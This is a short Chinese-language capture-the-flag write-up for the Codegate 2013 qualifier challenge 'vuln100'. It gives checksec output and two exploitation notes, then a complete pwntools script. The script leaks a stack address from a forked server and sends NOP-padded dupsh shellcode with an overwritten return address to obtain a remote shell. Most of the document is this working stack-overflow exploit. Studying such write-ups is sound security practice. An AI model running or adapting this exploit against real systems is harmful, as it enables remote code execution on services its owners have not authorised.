codegate-quals-2013-vuln100

最近想多看看题目积累些经验,

--------

程序分析

64位,保护措施都没开

gdb-peda$ checksec 
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

只是利用过程还饶了下,简单说下利用的几个点

1 通过fork生成的子进程的栈地址是不变的,所以这道题中可以使用先泄露出来的内存

2 函数中连续调用了memcpy strcpy,注意仔细分析具体细节

--------

from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug'

p = remote('127.0.0.1', 6666)

p.sendlineafter('x00', 'arsenal')
p.sendlineafter('x00', 'gyeongbokgung')
p.sendlineafter('x00', 'psy')

p.recvuntil('x00')

log.info('communicate complete')

p.sendline('a' + 'x00'*7)
leak_stack = u64(p.recvuntil('xffx7f')[-6:] + 'x00x00')

p.recvrepeat(2)

p.close()

log.info('get some info ' + hex(leak_stack))

r = remote('127.0.0.1', 6666)

r.sendlineafter('x00', 'arsenal')
r.sendlineafter('x00', 'gyeongbokgung')
r.sendlineafter('x00', 'psy')

r.recvuntil('x00')

log.info('communicate complete')

buf_0x10 = 0x7fff10e2dcd0
leak = 0x7fff10e2dd50

buf_addr = leak_stack + (buf_0x10 - leak)
#raw_input()
offset = 0x10
pad = asm(shellcraft.nop())
buf = pad * offset + asm(shellcraft.dupsh(4)) 
buf += pad * (0x110-8-len(buf)) + p64(buf_addr)

r.sendline(buf)



r.interactive()